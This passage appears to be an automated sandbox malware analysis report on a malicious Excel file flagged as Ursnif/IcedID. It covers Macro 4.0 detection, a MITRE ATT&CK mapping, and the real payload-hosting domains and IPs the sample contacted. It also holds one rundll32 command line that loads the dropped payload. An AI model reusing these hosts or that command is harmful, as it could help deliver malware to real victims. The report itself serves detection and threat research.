          Source: Yara matchFile source: 6.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 463
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gifJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00122A69 xor edi, dword ptr fs:[00000030h]

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Yara detected hidden Macro 4.0 in ExcelShow sources
          Source: Yara matchFile source: document-1245492889.xls, type: SAMPLE
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
          Source: Yara matchFile source: document-1245492889.xls, type: SAMPLE

          Stealing of Sensitive Information:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000006.00000002.2275673660.0000000000270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000006.00000002.2275673660.0000000000270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScripting31Path InterceptionProcess Injection11Masquerading121OS Credential DumpingApplication Window Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution33Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting31NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          document-1245492889.xls54%VirustotalBrowse
          document-1245492889.xls35%MetadefenderBrowse
          document-1245492889.xls18%ReversingLabsDocument-Excel.Trojan.IcedID

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\fikftkm.thj2100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif100%Joe Sandbox ML

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          mundotecnologiasolar.com
          		162.241.62.4
          		truefalse
            		unknown
            accesslinksgroup.com
            		192.185.129.4
            		truefalse
              		unknown
              ponchokhana.com
              		5.100.155.169
              		truefalse
                		unknown
                vts.us.com
                		207.174.213.126
                		truefalse
                  		unknown
                  comosairdoburaco.com.br
                  		198.50.218.68
                  		truefalse
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2115568867.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109524493.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278827735.0000000001C77000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2277292535.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177880792.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2171790992.0000000001CC7000.00000002.00000001.sdmpfalse
                      		high
                      http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmpfalse
                        		high
                        http://investor.msn.comrundll32.exe, 00000003.00000002.2115424423.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109348201.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278669504.0000000001A90000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2275869797.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmpfalse
                          		high
                          http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2115424423.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109348201.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278669504.0000000001A90000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2275869797.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmpfalse
                            		high
                            http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2115568867.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109524493.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278827735.0000000001C77000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2277292535.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177880792.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2171790992.0000000001CC7000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2115568867.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109524493.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278827735.0000000001C77000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2277292535.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177880792.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2171790992.0000000001CC7000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2115424423.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109348201.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278669504.0000000001A90000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2275869797.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmpfalse
                              		high
                              http://investor.msn.com/rundll32.exe, 00000003.00000002.2115424423.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109348201.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278669504.0000000001A90000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2275869797.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmpfalse
                                		high

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                207.174.213.126
                                		vts.us.comUnited States
                                		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                198.50.218.68
                                		comosairdoburaco.com.brCanada
                                		16276OVHFRfalse
                                162.241.62.4
                                		mundotecnologiasolar.comUnited States
                                		46606UNIFIEDLAYER-AS-1USfalse
                                5.100.155.169
                                		ponchokhana.comUnited Kingdom
                                		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                192.185.129.4
                                		accesslinksgroup.comUnited States
                                		46606UNIFIEDLAYER-AS-1USfalse

                                General Information

                                Joe Sandbox Version:31.0.0 Emerald
                                Analysis ID:383157
                                Start date:07.04.2021
                                Start time:10:55:10
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 7m 59s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:document-1245492889.xls
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:12
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winXLS@13/17@5/5
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:
                                • Successful, ratio: 98.4% (good quality ratio 85.8%)
                                • Quality average: 64.1%
                                • Quality standard deviation: 33.3%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .xls
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Found warning dialog
                                • Click Ok
                                • Attach to Office via COM
                                • Scroll down
                                • Close Viewer
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe, svchost.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 23.0.174.185, 23.0.174.200, 192.35.177.64
                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net, apps.identrust.com
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                10:57:08API Interceptor1x Sleep call for process: rundll32.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                207.174.213.126document-1305160161.xlsbGet hashmaliciousBrowse
                                • nhseven.tk/ds/08.gif
                                document-414236719.xlsbGet hashmaliciousBrowse
                                • nhseven.tk/ds/08.gif
                                document-1249966242.xlsbGet hashmaliciousBrowse
                                • nhseven.tk/ds/08.gif
                                http://anandice.ac.in/Paid-Invoice-Credit-Card-Receipt/Get hashmaliciousBrowse
                                • anandice.ac.in/Paid-Invoice-Credit-Card-Receipt/
                                198.50.218.68document-1048628209.xlsGet hashmaliciousBrowse
                                  document-1771131239.xlsGet hashmaliciousBrowse
                                    document-1370071295.xlsGet hashmaliciousBrowse
                                      document-69564892.xlsGet hashmaliciousBrowse
                                        document-1320073816.xlsGet hashmaliciousBrowse
                                          document-184653858.xlsGet hashmaliciousBrowse
                                            document-1729033050.xlsGet hashmaliciousBrowse
                                              document-1268722929.xlsGet hashmaliciousBrowse
                                                document-540475316.xlsGet hashmaliciousBrowse
                                                  document-1456634656.xlsGet hashmaliciousBrowse
                                                    document-12162673.xlsGet hashmaliciousBrowse
                                                      document-997754822.xlsGet hashmaliciousBrowse
                                                        document-1376447212.xlsGet hashmaliciousBrowse
                                                          document-1813856412.xlsGet hashmaliciousBrowse
                                                            document-1776123548.xlsGet hashmaliciousBrowse
                                                              document-1201008736.xlsGet hashmaliciousBrowse
                                                                document-684762271.xlsGet hashmaliciousBrowse
                                                                  document-1590815978.xlsGet hashmaliciousBrowse
                                                                    document-800254041.xlsGet hashmaliciousBrowse
                                                                      document-469719570.xlsGet hashmaliciousBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        ponchokhana.comFED8GODpaD.xlsbGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        catalogue-41.xlsbGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-1048628209.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-1771131239.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-1370071295.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-69564892.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-1320073816.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-184653858.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-1729033050.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-1268722929.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-540475316.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-1456634656.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-12162673.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-997754822.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-1376447212.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-1813856412.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-1776123548.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-1201008736.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-684762271.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-1590815978.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        mundotecnologiasolar.comdocument-1048628209.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-1771131239.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-1370071295.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-69564892.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-1320073816.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-184653858.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-1729033050.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-1268722929.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-540475316.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-1456634656.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-12162673.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-997754822.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-1376447212.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-1813856412.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-1776123548.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-1201008736.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-684762271.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-1590815978.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-800254041.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        document-469719570.xlsGet hashmaliciousBrowse
                                                                        • 162.241.62.4
                                                                        accesslinksgroup.comdocument-1048628209.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-1771131239.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-1370071295.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-69564892.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-1320073816.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-184653858.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-1729033050.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-1268722929.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-540475316.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-1456634656.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-12162673.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-997754822.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-1376447212.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-1813856412.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-1776123548.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-1201008736.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-684762271.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-1590815978.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-800254041.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4
                                                                        document-469719570.xlsGet hashmaliciousBrowse
                                                                        • 192.185.129.4

                                                                        ASN

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        UNIFIEDLAYER-AS-1USNotice-039539.xlsmGet hashmaliciousBrowse
                                                                        • 192.185.21.127
                                                                        Notice-039539.xlsmGet hashmaliciousBrowse
                                                                        • 192.185.21.127
                                                                        documents-2112491607.xlsmGet hashmaliciousBrowse
                                                                        • 192.185.56.250
                                                                        RFQ_AP65425652_032421 v#U00e1#U00ba#U00a5n #U00c4#U2018#U00e1#U00bb ,pdf.exeGet hashmaliciousBrowse
                                                                        • 74.220.199.6
                                                                        Order.exeGet hashmaliciousBrowse
                                                                        • 192.254.225.101
                                                                        FED8GODpaD.xlsbGet hashmaliciousBrowse
                                                                        • 108.167.180.111
                                                                        1A8C92C-1A8C92C.xlsGet hashmaliciousBrowse
                                                                        • 192.232.249.186
                                                                        1A8C92C-1A8C92C.xlsGet hashmaliciousBrowse
                                                                        • 192.232.249.186
                                                                        SecuriteInfo.com.Trojan.Agent.FFFK.8079.xlsGet hashmaliciousBrowse
                                                                        • 192.232.249.186
                                                                        SecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsGet hashmaliciousBrowse
                                                                        • 192.232.249.186
                                                                        SecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
                                                                        • 192.232.249.186
                                                                        SALM0BRU.exeGet hashmaliciousBrowse
                                                                        • 162.241.148.243
                                                                        Purchase Order.8000.scan.pdf...exeGet hashmaliciousBrowse
                                                                        • 162.241.148.243
                                                                        SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                                                                        • 192.232.249.186
                                                                        SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                                                                        • 192.232.249.186
                                                                        document-1251000362.xlsmGet hashmaliciousBrowse
                                                                        • 192.185.48.186
                                                                        document-1251000362.xlsmGet hashmaliciousBrowse
                                                                        • 192.185.48.186
                                                                        catalogue-41.xlsbGet hashmaliciousBrowse
                                                                        • 108.167.180.111
                                                                        documents-1660683173.xlsmGet hashmaliciousBrowse
                                                                        • 192.185.56.250
                                                                        06iKnPFk8Y.dllGet hashmaliciousBrowse
                                                                        • 162.241.54.59
                                                                        PUBLIC-DOMAIN-REGISTRYUSVAT INVOICE.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.224
                                                                        IMG_00000000001.PDF.exeGet hashmaliciousBrowse
                                                                        • 208.91.198.143
                                                                        documents-2112491607.xlsmGet hashmaliciousBrowse
                                                                        • 111.118.215.222
                                                                        FED8GODpaD.xlsbGet hashmaliciousBrowse
                                                                        • 5.100.152.162
                                                                        New Order PO#121012020_____PDF_______.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.225
                                                                        document-1251000362.xlsmGet hashmaliciousBrowse
                                                                        • 199.79.62.99
                                                                        document-1251000362.xlsmGet hashmaliciousBrowse
                                                                        • 199.79.62.99
                                                                        document-1055791644.xlsGet hashmaliciousBrowse
                                                                        • 103.50.162.157
                                                                        catalogue-41.xlsbGet hashmaliciousBrowse
                                                                        • 5.100.152.162
                                                                        documents-1660683173.xlsmGet hashmaliciousBrowse
                                                                        • 111.118.215.222
                                                                        swift Copy.xls.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.225
                                                                        document-1848152474.xlsmGet hashmaliciousBrowse
                                                                        • 199.79.62.99
                                                                        FN vw Safety 1 & 2.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.223
                                                                        MV TBN.uslfze.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.224
                                                                        purchase order.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.223
                                                                        AD1-2001028L.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.224
                                                                        AD1-2001028L (2).exeGet hashmaliciousBrowse
                                                                        • 208.91.199.224
                                                                        document-1048628209.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-1771131239.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        document-1370071295.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        OVHFRNATO_042021-1re4.docGet hashmaliciousBrowse
                                                                        • 51.254.63.225
                                                                        payment.exeGet hashmaliciousBrowse
                                                                        • 51.91.220.49
                                                                        B of L - way bill return.exeGet hashmaliciousBrowse
                                                                        • 51.89.93.216
                                                                        bOkrXdoYekZPyWI.exeGet hashmaliciousBrowse
                                                                        • 66.70.204.222
                                                                        06iKnPFk8Y.dllGet hashmaliciousBrowse
                                                                        • 51.91.76.89
                                                                        06iKnPFk8Y.dllGet hashmaliciousBrowse
                                                                        • 51.91.76.89
                                                                        SwiftMT103_pdf.exeGet hashmaliciousBrowse
                                                                        • 51.89.9.195
                                                                        1517679127365.exeGet hashmaliciousBrowse
                                                                        • 144.217.66.69
                                                                        7z7Q51Y8Xd.dllGet hashmaliciousBrowse
                                                                        • 51.91.76.89
                                                                        pySsaGoiCT.dllGet hashmaliciousBrowse
                                                                        • 51.91.76.89
                                                                        QOpv1PykFc.dllGet hashmaliciousBrowse
                                                                        • 51.91.76.89
                                                                        S4caD0RhXL.dllGet hashmaliciousBrowse
                                                                        • 51.91.76.89
                                                                        pH8YW11W1x.dllGet hashmaliciousBrowse
                                                                        • 51.91.76.89
                                                                        7z7Q51Y8Xd.dllGet hashmaliciousBrowse
                                                                        • 51.91.76.89
                                                                        pySsaGoiCT.dllGet hashmaliciousBrowse
                                                                        • 51.91.76.89
                                                                        QOpv1PykFc.dllGet hashmaliciousBrowse
                                                                        • 51.91.76.89
                                                                        S4caD0RhXL.dllGet hashmaliciousBrowse
                                                                        • 51.91.76.89
                                                                        pH8YW11W1x.dllGet hashmaliciousBrowse
                                                                        • 51.91.76.89
                                                                        wrtKaH8g28.dllGet hashmaliciousBrowse
                                                                        • 51.91.76.89
                                                                        Ip6jHpq61F.dllGet hashmaliciousBrowse
                                                                        • 51.91.76.89

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        7dcce5b76c8b17472d024758970a406bNotice-039539.xlsmGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        PO#070421APRIL-REV.pptGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        document-1251000362.xlsmGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
                                                                        document-1251000362.xlsmGet hashmaliciousBrowse
                                                                        • 207.174.213.126
                                                                        • 198.50.218.68
                                                                        • 162.241.62.4
                                                                        • 5.100.155.169
                                                                        • 192.185.129.4
